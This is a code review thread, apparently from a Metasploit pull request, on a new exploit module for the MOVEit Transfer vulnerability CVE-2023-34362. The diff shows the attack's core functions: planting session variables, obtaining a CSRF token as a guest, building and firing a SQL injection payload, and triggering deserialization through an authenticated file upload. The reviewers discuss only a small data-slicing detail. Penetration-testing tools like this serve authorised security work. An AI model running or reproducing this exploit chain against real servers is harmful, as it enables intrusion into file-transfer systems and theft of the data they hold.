modules/exploits/windows/http/moveit_cve_2023_34362.rb

```diff
@@ -0,0 +1,491 @@
+    session_hash.each_pair do |k, v|
+      session_vars.store("X-siLock-SessVar#{session_index}", "#{k}: #{v}")
+      session_index += 1
+    end
+    isapi_request(token, 'session_setvars', session_vars)
+  end
+
+  def sqli(cookies, sql_payload)
+    # Set up a fake package in the session. The order here is important. We set these session
+    # variables one per request, so first set the package information, then switch over to a
+    # 'Guest' username to allow the CSRF/injection to work as expected. If we don't do this
+    # order the session will be cleared and the injection will not work.
+    set_session(cookies, {
+      'MyPkgAccessCode' => 'accesscode', # Must match the final request Arg06
+      'MyPkgID' => '0', # Is self provisioned? (must be 0)
+      'MyGuestEmailAddr' => @guest_email_addr, # Must be a valid email address @ MOVEit.DMZ.ClassLib.dll/MOVEit.DMZ.ClassLib/MsgEngine.cs
+      'MyPkgInstID' => '1234', # this can be any int value
+      'MyPkgSelfProvisionedRecips' => sql_payload,
+      'MyUsername' => 'Guest'
+    })
+
+    # Get a CSRF token - this has to be *after* you set MyUsername, since the
+    # username is incorporated into it
+    #
+    # Transaction => request type, different types will work
+    # Arg06 => the package access code (must match what's set above)
+    # Arg12 => promptaccesscode requests a form, which contains a CSRF code
+
+    body = { 'Transaction' => 'dummy', 'Arg06' => 'accesscode', 'Arg12' => 'promptaccesscode' }
+    csrf = get_csrf_token(guestaccess_request(cookies, body))
+
+    # This does the actual injection
+    body = {
+      'Arg06' => 'accesscode',
+      'transaction' => 'secmsgpost',
+      'Arg01' => 'subject',
+      'Arg04' => 'body',
+      'Arg05' => 'sendauto',
+      'Arg09' => 'pkgtest9',
+      'csrftoken' => csrf
+    }
+    guestaccess_request(cookies, body)
+  end
+
+  def sqli_payload(sql_payload)
+    # Create the initial injection, and create the session object
+    payload = [
+      # The initial injection
+      "#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.com')",
+    ].concat(sql_payload)
+
+    # Join our payload, and terminate with a comment character
+    return payload.join(';') + ';#'
+  end
+
+  def trigger_deserialization(token_json, files_json, folders_json)
+    files_response = send_request_cgi({
+      'method' => 'PUT',
+      'uri' => normalize_uri("/api/v1/folders/#{folders_json['items'][0]['id']}/files?uploadType=resumable&fileId=#{files_json['fileId']}"),
+      'connection' => 'close',
+      'accept' => '*/*',
+      'verify' => false,
+      'headers' => {
+        'Authorization' => "Bearer #{token_json['access_token']}",
+        'Content-Type' => 'application/octet-stream',
+        'Content-Range' => "bytes 0-#{@uploadfile_size - 1}/#{@uploadfile_size}",
+        'X-File-Hash' => Digest::SHA1.hexdigest(@uploadfile_data)
+      },
+      'data' => @uploadfile_data[0, @uploadfile_data.length]
```

Comment:
Any context on why there's a slice here? 👀

```suggestion
      'data' => @uploadfile_data
```

Reply:
Unless this is meant to be using uploadfile_size in some capacity

Reply:
Changed locally, waiting on next push